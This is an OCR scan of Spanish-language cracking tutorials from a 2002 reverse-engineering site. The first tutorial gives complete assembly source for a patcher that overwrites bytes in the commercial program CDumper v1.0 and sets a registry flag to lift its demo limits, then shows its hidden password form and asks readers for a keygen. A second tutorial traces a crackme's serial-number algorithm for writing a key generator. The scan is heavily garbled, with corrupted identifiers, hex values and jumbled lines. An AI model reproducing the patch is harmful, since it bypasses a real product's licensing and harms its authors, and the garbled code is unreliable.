LTEXT "SACCOPHARYNX", IDC_STATIC,55,14,115,8,ES_CENTER 
GROUPBOX "Website", IDC_STATIC, 8,28,214,20 
LTEXT "http: //www.gmixon.com", IDC_STATIC,55,36,115,8,ES_CENTER 
GROUPBOX "Registro", IDC_STATIC,8,50,214,40 
PUSHBUTTON "¿Crackear",IDC_CRACKEAR, 35,65,50,14 
PUSHBUTTON "SgAcerca de", IDC_ABOUT, 90,65,50,14 
PUSHBUTTON "Salir", IDC_EXIT,144,65,50,14 
END 


Como puede observarse claramente en rsrc.rc se definen 
de nuestro patch (botones, ícono, tipografía, estilos, 
c:imasm32Xincludelresource.h lo incluimos porque en el 


Características (WS_CAPTION, DS_CENTER, ES_CENTER, etc. 


los controles y la apariencia 
etc.). El archivo 
están definidas muchas 


). 


Código fuente de CDumperPatch.asm 
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, 
.386 

.model flat,stdcall 
option casemap:none 


include Iimasm32lincludeNwindows.inc 
include Iimasm32lincludeluser32.inc 

include imasm32lincludelkernel32.inc 
include IWmasm32lincludel*comdlg32.inc 
include Imasm32lincludeladvapi32.inc 


includelib Imasm321libluser32.1lib 

includelib Amasm3211liblkernel32.lib 
includelib Amasm3211iblcomd1lg32.1lib 
includelib Iimasm32Xlibladvapi32.1lib 


Dl1lgFunc PROTO :DWORD, : DWORD, :DWORD, :DWORD 
PatchFile PROTO :BYTE, :DWORD 

WriteRegistry PROTO :DWORD 

ControlDeArchivo PROTO :DWORD 

CerrarArchivo PROTO :DWORD 


De este código lo que más importa son los 5 procedimientos definidos: 


Dl1lgFunc -> Controla el DialogBox que usamos para el patch. 

PatchFile -> Realiza el parcheo de CDumper.exe. 

WriteRegistry -> Escribe 1 como dato del valor DemoMsg en la Registry. 
ControlDeArchivo -> Chequea que CDumper.exe sea v1.0 y que no esté parcheado ya. 
CerrarArchivo -> Cierra CDumper.exe si fue abierto y libera la memoria. 
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. const 

IDD_DIALOG equ 1000 ; Este es el identificador del Dialog Box 
IDC_SERIAL equ 1002 ; 

IDC_EXIT equ 1003 ; Son los mismos identificadores de controles 
IDC_ABOUT equ 1004 ; definidos en rscr.rc 


IDC_CRACKEAR equ 1005 


MAXSIZE equ 260 ; Tamaño máximo del nombre del archivo (incluido el path). 
MEMSIZE equ 10 ; Pongo 10 porque se leen 9 valores (MEMSIZE-1). 
D_OFFSET equ 686569 ; Desplazamiento que hay hasta los bytes a parchear 


En esta sección se definen las constantes que tendrá el patch. MAXSIZE, MEMSIZE y 
D_OFFSET son tamaños medidos en bytes y en notación decimal. MEMSIZE es el tamaño de 
la memoria donde se copiarán los cuatro bytes a parchear, más los otros cinco que 
usaré para ControlDeArchivo. 
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. data 

bytescorrectos db 8Bh,45h,0FCh, 50h,56h, 6Ah, 00h, 8Bh, 0C7h 
ofn OPENFILENAME <> 

FilterString db "CDumper.exe",0,"CDumper.exe",0,0 
buffer db MAXSIZE dup(0) 

Icono db "app",0 

Iconimage db "app",0 

hIcon da 0 

hWnd da 0 


¿MANEJO DE MENSAJES 


MsgCaption db "CDumper v1.0 Patch",0 
MsgBoxText4 db "CDumper v1.0 patched 0OK.",0 
ErrorMessagel db "Error abriendo archivo!!!",0 


ErrorMessage2 db "Error inesperado de memoria!!!",0 


ErrorMessage3 db "Error inesperado de archivo!!!",0 


ErrorMessage4 db "Error de lectura de archivo!!!",0 
ErrorMessageb db "Error de escritura de archivo!!!",0 
ErrorMessage6 db "No se seleccionó ningún archivo!!!",0 


ErrorMessage7 db "CDumper.exe versión distinta o ya parcheada",0 

ErrorMessage8 db "Error escribiendo CLAVE en Registry",0 

ErrorMessage9 db "Error escribiendo VALOR en Registry",0 

ErrorMessagel0 db "Error cerrando Registry",0 

txtl db "Desde las profundidades del abismo, SACCOPHARYNX / [13/02/2002]" 


¿MANEJO DE REGISTRY 


sSubKey db "SOFTWARENGMixon*CDumperADemo",0 
SNamel db "DemoMsg",0 
Datol dd 1 


Aquí definimos los datos inicializados: bytescorrectos son los bytes originales de 
CDumper.exe y los uso para control; ofn es una estructura necesaria para el manejo 
archivos; buffer contendrá el path y el nombre del archivo a parchear (que como se 
en FileString este será Cdumper.exe); sSubKey contiene el nombre de la entrada que 


¿0 


de 
ve 


crearemos en la registry; sNamel contiene el nombre del único valor que escribiremos 


en esta entrada, y Datol es el dato que escribiremos en el valor DemoMsg. El resto 
para el manejo del ícono del patch, los handles necesarios y los mensajes. 


7 


.data? 

hInstance HINSTANCE ? 
hFile HANDLE ? 
hMemory HANDLE ? 
pMemory DWORD ? 
SizeReadWrite DWORD ? 
phKey dd ? 


phDisposition dd ? 


En esta sección se definen los datos no inicializados para el manejo de instancias, 
archivos y memoria. 


; 
. code 
start: 
invoke GetModuleHandle, NULL 
mov hInstance,eax 
invoke DialogBoxParam,hInstance, IDD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess,NULL 


Aquí comienza la sección de código. Se obtiene el handle del módulo, se invoca a 
DialogBoxParam, diciendo que DlgFunc es el procedimiento que controlará los eventos 
de este Dialog Box (IDD_DIALOG), y que cuando salgamos del Dialog Box se invoque a 
ExitProcess para terminar la ejecución de nuestro patch. 


r 
DlgFunc proc hDl1g:DWORD, uMsg: DWORD, wParam:DWORD, lParam: DWORD 
.1f uMsg==WM_INITDIALOG 

¿Inicializa el DialogBox 

mov eax,hDlg 

mov hWnd, eax 

invoke LoadIcon,hInstance,ADDR Icono 

mov hlIcon,eax 

invoke SendMessage, hDlg, WM_SETICON,1,hIcon 


es 


¿Inicializa los miembros de la estructura OPENFILENAME 
mov ofn.lStructSize,SIZEOF ofn 

push hWnd 

pop ofn.hWndOwner 

push hInstance 

pop ofn.hInstance 

mov  ofn.lpstrFilter, OFFSET FilterString 


mov  ofn.lpstrFile, OFFSET buffer 
mov  ofn.nMaxFile,MAXSIZE 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


Comienza el procedimiento DlgFunc el cual procesa los mensajes enviados a nuestro 
DIALOG BOX. Como se ve aquí, si el DIALOG BOX recibe el mensaje WM_INITDIALOG 
inicializo el handle, el ícono y la estructura necesaria para el manejo de archivos. 
Cuando recibe el mensaje WM_CLOSE se debe cerrar el DIALOG BOX para lo cual invocamos 
a EndDialog. 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 


7 
; EXIT (SALIR) 
7 


invoke SendMessage,hDlg,WM_CLOSE,0,0 


.elseif ax==IDC_CRACKEAR 
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¿ COMIENZO DE LA OPERACION DE CRACKING (CRACKEAR) 
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invoke PatchFile,1,hDlg 


.1f eax == 6666 ¡Se escribió correctamente el archivo. 
invoke WriteRegistry,hDlg 
.1f eax == 6666 ¡Se escribió correctamente la registry. 


invoke MessageBox, Y 
hDl1g, ADDR MsgBoxText4, Á 
ADDR MsgCaption, A 


MB_OK 
.elseif ¿Si la registry se escribió mal restauro el archivo. 
invoke PatchFile,0,hDlg 
.endif 
.endif 


.elseif ax==IDC_ABOUT 


F 
; ABOUT (ACERCA DE) 
; 
invoke MessageBox,hDl1g,ADDR txt1,ADDR MsgCaption,MB_OK 
.endif 
.endif 

.endif 

ret 

DlgFunc endp 


Cuando el DIALOG BOX recibe el mensaje WM_COMMAND quiere decir que uno de los botones 


definidos en rsrc.rc pudo haber sido clickeado, eso es lo que controlaremos aquí. El 
que más nos importa es IDC_CRACKEAR, ya que aquí se harán las operaciones necesarias 
para el patch. Si al retorno de PatchFile eax vale 6666 quiere decir que CDumper.exe 
se parcheó correctamente, entonces procedemos a escribir la entrada en la registry 
invocando WriteRegistry. Si la entrada se escribió correctamente eax volverá a valer 
6666 y el patch funcionó a la perfección. Si no se pudo escribir con éxito la entrada 
en la registry, restauro los bytes originales de CDumper.exe y todo queda como estaba 
antes (el patch no cambia nada). Tanto para escribir los bytes originales, como los 
del patch uso el mismo procedimiento (PatchFile), por eso el primer parámetro que le 
paso es un flag, que está en 1 (para parchear) o en 0 (para escribir los bytes 
originales si hubo un error). 


Bueno, esa es la estructura principal del patch. Ahora entraremos en más detalles. 


r 
PatchFile PROC dbFlag:BYTE,hDl1g: DWORD 
.1f dbFlag == 1 
mov ofn.Flags, OFN_FILEMUSTEXIST or A 
OFN_PATHMUSTEXIST or OFN_LONGNAMES or 
OFN_EXPLORER or OFN_HIDEREADONLY 
invoke GetOpenFileName, ADDR ofn 
.else 
mov eax,1l 
.endif 


¿Si no hubo error y se seleccionó un archivo sigue. 
.1f eax==TRUE 


Comenzamos con el procedimiento PatchFile. La API GetOpenFileName es la que nos deja 
seleccionar un archivo. En este Caso el que queremos parchear. Pero antes de 
invocarla debemos saber si estamos parcheando el archivo, o si estamos restaurando 
los bytes originales. Porque si estamos restaurando los bytes originales debido a un 
error en la escritura de la registry, ya habíamos seleccionado el archivo y no hace 
falta hacerlo nuevamente. Si eax es TRUE (distinto de cero) no hubo error al 
seleccionar el archivo y podemos empezar con el patch. El registro eax solo valdrá 
6666 en PatchFile cuando se llegue al final del procedimiento (antes del último ret). 


; Abro el archivo seleccionado; CreateFile también abre archivos 


r 
invoke CreateFile, ADDR buffer,NX 
GENERIC_READ or GENERIC_WRITE ,A 
FILE_SHARE_READ or FILE_SHARE _WRITE,NX 
NULL, OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE, NX 
NULL 
; Control de error de apertura de archivo 
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.1f eax == INVALID_HANDLE_VALUE 
invoke MessageBox, hDlg,ADDR ErrorMessagel, ADDR MsgCaption, MB_OK 
ret 

.endif 


mov hFile,eax 


; Obtengo el handle de la memoria a utilizar para alojar los bytes a leer 


7 
invoke GlobalAlloc,GMEM_MOVEABLE or GMEM_ZEROINIT,MEMSIZE 
; Control de error de Memoria 
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.1f eax == NULL 


invoke MessageBox, hDlg,ADDR ErrorMessage2, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 

.endif 

mov hMemory,eax 


; Obtengo el puntero a la zona de memoria donde se alojarán los bytes a leer 


, 
invoke GlobalLock,hMemory 
; Control de error de Memoria 


r 
.1f eax == NULL 
invoke MessageBox, hDlg,ADDR ErrorMessage2, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
invoke GlobalFree, hMemory 
ret 
.endif 
mov pMemory,eax 


; Pongo el puntero de archivo apuntando a los bytes a parchear. 


, 
invoke SetFilePointer,hFile,D_OFFSET,NULL,FILE_BEGIN 
¿ Control de error de búsqueda en archivo 


r 
.1f eax == OFFEFFEEFEA 
invoke MessageBox, hDl1g,ADDR ErrorMessage3, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


; Leo del archivo los bytes para control y modificación del mismo. 


, 
invoke ReadFile,hFile,pMemory,MEMSIZE-1,ADDR SizeReadWrite, NULL 
¿ Control de error de lectura en archivo 


r 
.1f eax == 0 
invoke MessageBox, hDlg,ADDR ErrorMessage41, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


Esta parte no presenta complicaciones si observan bien. Está dividida claramente en 
cinco pasos Cada uno de los cuales dice que es lo que hace, y además todos presentan 
la misma estructura: Se invoca una API y luego se controla si hubo un error o no 
mediante el valor que tenga el registro eax. Pueden ver que si hubo un error eax no 
vale 6666, se despliega el mensaje correspondiente, se invoca al procedimiento 
CerrarArchivo y retornamos a DlgFunc. Los valores retornados por las APIs en eax y 
los parámetros que se les pasan a las mismas, los tomé de La Referencia de APIs, por 
eso anteriormente les dije que la bajen de internet ya que es de mucha utilidad. No 
vayan a pensar que yo sabía todo eso por arte de magia. 


¿ Controlo que sea el CDumper v1.0 antes de parchear. 
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.1f dbFlag == 1 
invoke ControlDeArchivo, pMemory 
.1f eax == 666 


invoke MessageBox, hDl1g,ADDR ErrorMessage7, ADDR MsgCaption, MB_OK 


invoke CerrarArchivo, eax 
ret 
.endif 
.endif 


Si dbFlag vale 1 quiere decir que estoy intentando parchear Cdumper.exe y no 
restaurando los bytes originales. Eso lo hago porque si hay un error escribiendo la 
registry, no me dejaría restaurar los bytes originales de CDumper.exe, porque me 
diría que el archivo ya fue parcheado. Luego invoco a ControlDeArchivo y si este 
procedimiento retorna un 666 en eax quiere decir que CDumper.exe no es v1.0 o que ya 
fue parcheado. 


; Escribo el patch en memoria dependiendo del Flag 
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push edi 
mov edi, pMemory 
.1f dbFlag == 1 


mov byte ptr [edil, 6ah 
mov byte ptr [edi+1], 00h 
mov byte ptr [edi+2], 90h 
mov byte ptr [edi+3], 90h 

.elseif 
mov byte ptr [edil], 8Bh 
mov byte ptr [edi+1], 45h 
mov byte ptr [edi+2], OFCh 
mov byte ptr [edi+3], 50h 

.endif 

pop edi 


Antes de escribir el patch o la restauración en el archivo CDumper.exe debemos 
escribir los cambios en la memoria. Para lo cual movemos pMemory a edi, para que edi 
contenga un puntero a la zona de memoria donde se leyeron los bytes del archivo. Una 
vez hecho esto vamos incrementando en uno este puntero y copiamos los bytes según 
corresponda, dependiendo del valor del flag. 


; Retorno el puntero al lugar correcto porque avanzó los bytes que se leyeron 


, 
invoke SetFilePointer,hFile,D_OFFSET,NULL,FILE_BEGIN 
¿ Control de error de búsqueda en archivo 


r 
.1f eax == OFFEFFEEFEA 
invoke MessageBox, hDl1g,ADDR ErrorMessage3, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


; Escribo los cambios (el patch) en el archivo 


, 
invoke WriteFile,hFile,pMemory,MEMSIZE-1,ADDR SizeReadWrite, NULL 
¿ Control de error de escritura en archivo 


E 
.1f eax == 0 
invoke MessageBox, hDl1g,ADDR ErrorMessage5, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


Las dos partes de código de arriba funcionan igual que las cinco anteriores. Pero 


cabe una explicación extra: cuando leemos bytes de un archivo a partir de una 
posición, el puntero del archivo avanza la cantidad de bytes que leímos, por lo tanto 
antes de hacer la escritura del archivo, debemos poner el puntero nuevamente en el 
mismo lugar en el que estaba justo antes de la lectura, porque lo que nosotros 
queremos es sobreescribir los bytes leídos. 


¿ Si llegamos hasta aquí y no hubo errores, entonces delvuelvo 6666 en eax 


7 
invoke CerrarArchivo, eax 
mov eax, 6666 


ret 

.elseif 
invoke MessageBox, hDl1g,ADDR ErrorMessage6, ADDR MsgCaption, MB_OK 
ret 

.endif ; Este .endif cierra .if eax==TRUE 


PatchFile ENDP 


No hay más que explicar con respecto a ese código. Basta con la explicación en él 
incluída. Aquí se terminó el procedimiento PatchFile. 


7 
WriteRegistry PROC hDlg: DWORD 
¿ CREAR ENTRADA EN LA REGISTRY 


F 
invoke RegCreateKeyEx, HKEY_LOCAL MACHINE, addr sSubKey, NULL, NULL, 
REG_OPTION_NON_VOLATILE, KEY_ WRITE, NULL, addr phKey, 

addr phDisposition 
¿ Chequea si no hubo error en crear la entrada en registry 


r 
.1f eax != ERROR_SUCCESS 
invoke MessageBox, hDl1g,ADDR ErrorMessage8, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


¿ ESCRITURA DEL VALOR DE DemoMsg EN REGISTRY 


, 

invoke RegSetValueEx, phKey, addr sNamel, NULL, REG_DWORD, addr Datol, 
SIZEOF Datol 

¿ Chequea si no hubo error en la escritura 


r 
.1f eax != ERROR_SUCCESS 

invoke MessageBox, hDl1g,ADDR ErrorMessage9%, ADDR MsgCaption, MB_OK 

.1f phDisposition == REG_CREATED_NEW_KEY 

invoke RegDeleteKey, phKey, addrs SubKey 
.elseif 
invoke RegCloseKey, phKey 

.endif 

invoke CerrarArchivo, eax 

ret 
.endif 


¿ CERRANDO ENTRADA EN LA REGISTRY 
, 
invoke RegCloseKey, phkKey 

¿ Chequea si no hubo error en el cierre 


7 


.1f eax !|= ERROR_SUCCESS 


invoke MessageBox, hDlg,ADDR ErrorMessagel0, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 

.endif 


; Si llegamos hasta aquí y no hubo errores, delvuelvo 6666 en eax 


, 

mov eax, 6666 

ret 
WriteRegistry ENDP 


Este es el procedimiento que escribe la entrada en la registry. Presenta la misma 
estructura que el procedimiento anterior y no merece mucha explicación. Antes de 
escribir un valor y su dato en la registry, necesitamos abrir o crear una entrada en 
. Si todo 


la cual lo escribiremos, y luego de la escritura se debe cerrar la entrada 
funcionó bien retornamos 6666 en eax. Si hubo un error al intentar escribi 


r la 


registry borramos la entrada (Key), solo si esta fue creada por nuestro patch. 


existía no se borra, solo cerramos dicha entrada. 


; Este procedimiento chequea que el archivo CDumper.exe no esté parcheado 
¿ O que no sea de otra versión. 
; ReadFile lee nueve bytes a partir de la posición de donde se parchean 
; los cuatro bytes necesarios. Leo cinco bytes más para hacer la 
¿ comparación entre nueve bytes: 
; bytescorrectos -> contiene los bytes correctos de CDumper.exe v1.0 
; mientras que pDataMemory -> apunta a los bytes leidos 
; Yo asumo que CDumper.exe es la versión 1.0 sin parchear, si la 
¿ comparación de los nueve bytes es exitosa. Se pude hilar más fino. 
ControlDeArchivo PROC pDataMemor y : DWORD 
push esi 
push edi ; Salvo en la pila el valor de los registros que uso 
push ecx ; Para evitar errores 
push edx 
mov ecx, -1 
mov edi, pDataMemory ¿ edi apunta a los bytes leidos 
mov esi, offset bytescorrectos ; esi apunta a los bytes correctos 
ciclo: 
inc ecx 
cmp ecx, 9 ¿ Cuando ecx valga 9 se han comparado los 9 bytes 
je ok 
mov dl, byte ptr [edi+ecx] ¿ comparo un byte leido con uno de 
cmp dl, byte ptr [esit+ecx] ; los originales 
e ciclo 
jmp error 


mov eax, 666 ; Si la comparación falló retorno 666 en eax 
jmp salir 


mov eax, O ¿ Si la comparación fue exitosa retorno 0 en eax 


pop edx 
pop ecx 
pop edi ; Recupero los registros y retorno 
pop esi 
ret 
ControlDeArchivo ENDP 


Este es el procedimiento para saber si debemos parchear o no CDumper.exe. 


En el 


Si ya 


mismo 


códido se incluye la explicación del procedimiento. 


r 
¡Cierro el archivo y libero la memoria según corresponda 
CerrarArchivo PROC ddValor : DWORD 
invoke CloseHandle,hFile 
.1f ddValor != NULL ¿Solo si ddValor no es nulo se libera memoria 
invoke GlobalUnlock,pMemory 
invoke GlobalFree, hMemory 
.endif 
ret 
CerrarArchivo ENDP 


, 
end start 


Bueno, hemos llegado al último de los procedimientos. Solo sirve para cerrar 
CDumper.exe y liberar la memoria según ddValor, en caso de que se haya pedido memoria 
al sistema. 


Aca se termina la explicación del código fuente. Este es todo el patch. Para compilar 
el código fuente solo deben descomprimir CDumperPatchSrc.zip en un directorio, cargar 
MASM32, abrir el archico CDumperPatch.asm, ir a la opción Project del menu, y 


seleccionar Build All. Esto generará CDumperPatch.exe, que al ejecutarlo se verá algo 
así: 
CDumper v1.0 Patch Pa E 
Cracker 
SACCOPHARYNX 
Website 
http: 44 gmixor. cor 


Acerca de Salir 


Recuerden que antes de parchear a Cdumper.exe, por las dudas, es recomendable 
desinstalar este programa y borrar las entradas en la registry, volver a instalarlo 
pero sin ejecutarlo aún, aplicar el patch y luego ejecutarlo, y ahora sí, a disfrutar 
de la música. Ahora les voy a mostrar el otro punto de ataque. 


Otro punto de ataque 


Cuando se me ocurrió pasar el CDumper.exe por File InsPEctor vi que fue desarrollado 
en Borland Delphi 3.0, por lo tanto procedí a desensamblar con DEDE 3.0 y me llevé 
una pequeña sorpresa que es muy común últimamente. Los programadores ocultan los 
Forms de registración. Si desensamblan CDumper.exe y van a Forms, verán esto: 


DeDe y3. Ob lc] 1999- 2001 Le abba [olx] 


e Várchivos de e. +] El Process ss | Unknown 


“Classes Info | Units into || Foms | Procedures | Project | Esports | 


object PasswordDialog: TPasswordDialog 


TAboutForm 00108140 CORE 
TCDDB 00108340 ActiveContil = Edit 
TConfigurationDialog D010EE 44 


Border5tyle = bsDialog 


TCrossfaderForm 00115430 EE : 

TKaraokeForm 001197C0 o 

TLogicallCD Form 00114D14 Clientw'idth = 273 

TLoginDialog D014DB0C ParentFont = True 

TMainForm D014DF80 PixelsPerlnch = 96 

TNameCaptionForm 0014ED58 Position = poScreenCenter 

TNameCaptionFoarmD4  0014F140 TextHeight = 13 

TPasswordDialog 0014F568 object OKButton: TButton 

TPhysicalCD Form 0014F92C Left = 109 

TPluglninspectorForm 00156400 Top =38 

TRegDlg 00156424 o 

TSplashForm DO156E20 Height" > 
TThreeDForm 0018F464 y 


Ready 11 sec. [CDumper.exe ÍT711104 bytes | Lo 


Así es, existe un formulario para el ingreso del password y seguramente registración 
del software. Entoces vamos a buscar este formulario oculto. Si van a Help->About 
verán lo siguiente: 


About CDumper ma xj 


> 25811 CDumper version 1,0 
AA >; A s Copyright (C) 1998 by Emmanuel Ruiz £ tanier Muñoz, 
. DE .gmixon.com 


Notice: This computer program is protected by copyright laws and international 
treaties. Unauthonized reproduction or distribution of this program, or any portion. 
ofiít, may result ín severe civil and criminal penalties, and will be prosecuted to 
the maximum extent possible under the law. 


Si hacen dos clicks (no doble-click) sobre la imagen de este Form verán esto: 


> 
EMO 
“17 Register 
——Q CDumper version 1.0 _Betster_| 


Copyright (C) 1993 by Emmanuel Ruiz 8: lanier huñoz, 
www .gmixon.com 


Notice; This computer program is protected by copyright laws and international 
treaties. Unauthorized reproduction or distribution of this program, or any portion 
of ít, may result in severe civil and criminal penalties, and will be prosecuted to 
the maximum extent possible underthe law, 


Hemos habilitado el botón de registración (Register). Click sobre el mismo y: 


xi 


Passyeord: | 


coca _| 


No se preocupen que el tutorial termina aquí, Jejeje, pero quería mostrarles esto, 
para tener en cuenta que a veces puede haber más de un camino para alcanzar el éxito. 


Yo estuve traceando un buen rato, luego de poner el breakpoint más famoso en este 
mundo (bpx hmemcpy), pero debido a un imprevisto en la computadora no pude continuar 
con el traceo. Si alguien tiene la amabilidad de hacerlo por mí y mandarme un KeyGen, 
o al menos explicarme el algoritmo que comprueba que el password sea correcto, se lo 
agradecería mucho. Un dato: El password se guarda encriptado en la registry en la 
entrada GMixon. Abajo de todo está mi dirección de e-mail por si alguien hace algo o 
tiene dudas. 


Saludos 


¡Bueno colegas de todo el mundo, aquí se terminó este tutorial, de verdad, Jejeje. Se 
que se hizo extenso, pero quería que todo este bien explícito. Aprovecho para 
agradecer a Karpoff por enviarme unos archivos que necesitaba, y al resto de los 
crackers que aportan material al sitio. Sigamos así gente que la unión hace la 
fuerza. Saludos a todos. 


Desde las profundidades del abismo 


saccopharynxftyahoo.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 
Programa: Crackme! D3AM v1.0 DE DeAtH 


PROTECCION: Encontrar numero de serie Y Hacer KeyGenerador 
Describeion: Crackme para practicar en este mundo de la ingenieria inversa, se trata de encontrar el numero de serie 
paa correcto y ademas hacer un Generador de Keys 


Dificultad: Aconado 


DOWNLOAD: http: //come.to/karpoff 


Softice, W32dasm, y Bastantes Nociones sobre el Funcionamiento del Copro y en Sobremanera unas 
ordenes concretas 


CRACKER: Nandois FECHA: 01/02/2002 


Herramientas: 


| INTRODUCCION 
Hola!!! 


Este es un Crackme con el cual pasas de querer dejarlo todo para siempre mas, a ver lo alucinante que es este 
mundo de la ingenieria inversa y lo poco que sabes, de este mundo, al menos yo. 

De este Crack lo menos importante,es lo importante de un crack y es encontrar el numero de serie, pues realmente 
cuando tienes el numero de serie de un programa 

ya tienes lo que querias, poco importa, como lo has conseguido. 

Pero en este caso el Productor del crack, pedia para que el mismo se diera por resuelto que se tenia que hacer un 
generador del mismo. 

Y aqui es donde realmente se hace interesante la manera que DeAth se monto el numero y me complico la 
existencia. 

Basta de charla y vamos a ver el Crack. 


[o ALATAKE 


De entrada vemos con el Filel nspector, que usa UPX para comprimir el archivo 


vemos que se puede descomprimir sin problemas, y el archivo nos pasa de 13Kb a 50Kb, en fin una vez 
descomprimido lo corremos con el Wsdamm, pasamos un ratito con el y encontramos, un salto que una vez 
modificado nos dice que somos unos buenos crackers ect. ect.. 


Abrimos el Sice y despues de un breve paseo por él vemos en un lugar, que se origina un numero, 
cerramos el Sice ponemos el numero que vimos y jo, funciona. 

En un ratito hemos pillado un salto que hablando hipoteticamente, haciendole un pequeño cambio, nos 
registra el producto, y luego mirando un poco mas vemos que tenemos el numero que nos registra dicho 
producto, ya ni tan siquiera, tener que molestarnos en modificar el programa. 


Pues vaya, piensas, tecnicamente es una muy mala proteccion, pues no se puede decir que este muy bien 
protegido, es que no existe proteccion. 


Visto esto y muy contentos, nos metemos en la boca del lobo intentando hacer el generador de Keys del programa. Y aqui es 
donde no tiene desperdicio el montaje que hace DeAth. 


Vamos a por el; 


Lo primero que hay que tener presente es que el nombre de entrada tiene que tener como minimo " seis digitos " o mas. 
El segundo control que hace DeAtH es que el numero ó la clave que se ponga tiene que terminar con la letra " d ". 
Pasados estos dos controles, empieza el baile para la obtencion del numero de serie correcto. 


Primero coge los digitos, tercero y segundo y los multiplica. 
aqui tenemos la referencia a esta primera operacion. 


* Reference To: MSVBVM60, _vbaVarMul, Ord: 0000h 
:004068FF FFISOCIOAOLO Call dword ptr [0040109C] 


Guarda el resultado y va por la segunda operacion 
Para Esta operacion se utilizan el penultimo digito y el cuarto. 


* Reference To: MSVBVM60,  _vbaVarAdd, Ord: 0000h 


| 
:00406AC4 FF15F8104000 Call dword ptr [004010F8] 


:00406ACA 8D8DECFBFFFF lea ecx, dword ptr [ebp+FFFFFBEC] 
:00406ADO 50 push eax 


El resultado de la suma lo multiplica por dos dos veces. 


A continuacion al valor obtenido le añade el total que tenia de la multiplicacion 
anterior. 
Y guarda este total al que a partir de ahora llamaremos total. 


Siguiendo la manipulacion del nombre ahora se coge el quinto digito y se multiplica por tres el valor obtenido se añade al 
total generando un nuevo total 


Segimos, ahora se coge el primer digito y sexto digito. 
se multiplican y el valor se añade al total con lo cual tenemos un nuevo valor total. 


De momento como veis la elaboracion de la Key es una serie de operaciones aritmeticas facilonas y que hemos visto en 
muchos trabajos, y esto es lo que 
en su momento pensó DeAtH, y es a partir de aqui, que la cosa se lia. 


Voy a poner la siguiente operación y luego la comentamos. 


Este codigo empieza o esta dentro de la call401048. 
* Reference To: MSVBVM60,  vbaVarPow, Ord:0000h 


| 
:00406E48 FF1548104000 Call dword ptr [00401048] 


MOVSX EDX, DWORD ptr[ ESI +4] 
MOV[ESP+48], EDX 

FILD DWORD ptr[ESP+48] 

FSTP REALS8 ptr [ESP+20] 
MOVSX EDX, WORD ptr [ESI +08] 
MOV [ESP+48], EDX 

FILD DWORD ptr [ESP+48] 
FSTP REAL8 ptr [ESP+20] 


FLD REAL8 ptr [ESP+20] 


FSTP REAL8 ptr[ESP] 
FLD REAL8 ptr[ ESP-08] 
FSTP REAL8 ptr[ESP] 
FLD REAL8 ptr[ 7FEA6F98] 
FLD REAL8 ptr[ EBP+08] 
FCOMP st(1) 

FSTSW AX 

SAHF 

FLD REAL8 ptr[ EBP+08] 
FCOMP st(1) 

FSTSW AX 

SAHF 

FSTP st(0) 

FLD REAL8 ptr[ EBP+08] 
FLD REAL8 ptr[ebp+10] 
FXCH st(1) 

FSTP REAL8 ptr[ESP] 
FST REAL8[ESP+08] 
FSTCW WORD ptr [ESP] 
FSTCW WORD ptr [ESP+06] 
FLD REAL8 ptr[EDX] 


FSUBR st(1) 
EXCH st(1) 

FCHS 

F2XM1 

FLD1 

FADDP st(1), st 

FSCALE 

ESTP (1) 

FST REALS ptr [ESP] 
FLDCW WORD ptr[ESP!. 


Bien, aqui termina una serie de operaciones que como no tenia ni idea de lo 
que hacian, me hicieron hacer muchas cosas, entre ellas dejar el Crack para otro mas experimentado que yo, pero a base de 
hacer preguntas, y buscar, empezé a entender lo que hacia el crackme. 


Todo lo expuesto anteriormente es el paso siguiente en la elaboracion del numero bueno del crackme, se coge el segundo 
digito del nombre y se transforma en Real extendido (64bits) y luego le aplica una serie de operaciones con la que obtiene un 
numero en base 64bits. 


Como ejemplo vale decir que si el segundo digito fuera la letra " b ", que tiene un valor igual a 62hexa, despues de pasarlo a 
real-extendido 64bits el valor 

de 62 hexa seria igual a 4058800000000000. 

y este valor una vez pasadas las anteriores operaciones quedaria como 


40C2C20000000000.- 


Lo que no he podido conseguir ni llegar a saber es como y que operaciones se hacen para convertir un numero decimal a real 
extendido, lo pedi a muchos lugares, y, o no saben o no quieren contestar. 

Pero como lo que interesaba era hacer el generador, cuando uno no sabe bien como va la cosa , siempre se puede 
improvisar, y a base de unos inventos propios y mucho trabajo se consiguió. 


A partir de aqui se trabaja la elaboracion de la key en base real-extendido 16bits 


Una vez conseguido el valor que nos da la elaboracion del segundo digito, le sumamos el TOTAL que teniamos de las 
operaciones anteriores obteniendo un nuevo TOTAL pero recordad en base real-extendido 16bits. 

Acontinuacion coge los digitos tercero y primero los multiplica y el valor obtenido lo añade al total consiguiendo un nuevo 
TOTAL. 


Luego coge el cuarto digito por delante y el cuarto digito por detras los multiplica 
y su resultado lo añade al total con la que ya tenemos un nuevo TOTAL, 


Ahora para seguir mareando la perdiz, coge el ultimo digito del nombre y el cuarto por detras, los resta y el resultado lo 


| añade al total, con lo que ya tenemos un nuevo TOTAL. 
Ahora se coge la constante 65hexa, la multiplica por el total, y ya tenemos un nuevo TOTAL. 
Aqui realiza una operacion, que mas bien, parece de relleno, pues lo que hace es restar uno al total acumulado. 


A continuacion se coge la constante 5DC h. 1500 en decimal y se resta al total que teniamos, con lo cual ya tenemos un 
nuevo TOTAL. 


Las tres siguientes operaciones, en principio parecen tres simples multiplicaciones pero tienen su trampita, para despistados o 
agotados, de tanto meneo de numeros. 

Primero se coge el total y se multiplica por tres y obtenemos un nuevo total. 

despues cogemos el total y lo multiplicamos por dos y tenemos aqui la trampita, pues guardaremos el resultado obtenido 
